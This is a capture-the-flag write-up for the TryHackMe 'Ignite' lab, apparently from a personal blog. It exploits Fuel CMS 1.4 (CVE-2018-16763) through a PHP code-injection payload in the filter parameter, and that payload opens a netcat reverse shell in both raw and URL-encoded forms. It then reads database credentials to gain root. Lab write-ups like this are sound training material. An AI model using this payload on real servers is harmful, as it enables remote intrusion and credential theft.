Link: https://tryhackme.com/room/ignite
#1 “User.txt“
First, we access: http://10.10.237.127/
![](https://niekdang.wordpress.com/wp-content/uploads/2021/04/image-209.png?w=1024)
We found that this page is using Fuel CMS version 1.4. Do a little research and we know that it has a vulnerability named CVE-2018-16763.
Scroll down and we found a login link with a credential of the admin.
![](https://niekdang.wordpress.com/wp-content/uploads/2021/04/image-213.png?w=766)
After login, we can exploit the vuln. This page is vulnerable in this link:
http://10.10.237.127/fuel/pages/select/?filter=
Stand up a netcat listener on port 1234.
nc -lvnp 1234
Trigger our shell with payload:
'+pi(print($a='system'))+$a('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.6.63.158 1234 >/tmp/f')+'
URL encode:
http://10.10.237.127/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%2010.6.63.158%201234%20%3E%2Ftmp%2Ff%27%29%2b%27
![](https://niekdang.wordpress.com/wp-content/uploads/2021/04/image-211.png?w=519)
And we found the user’s flag.
#2 “Root.txt”
We enumerate the web page folder and we can find the database file in /var/www/html/fuel/application/config/database.php
.
Read that file and we found the root’s credential.
su -
and we found the root’s flag.
![](https://niekdang.wordpress.com/wp-content/uploads/2021/04/image-214.png?w=215)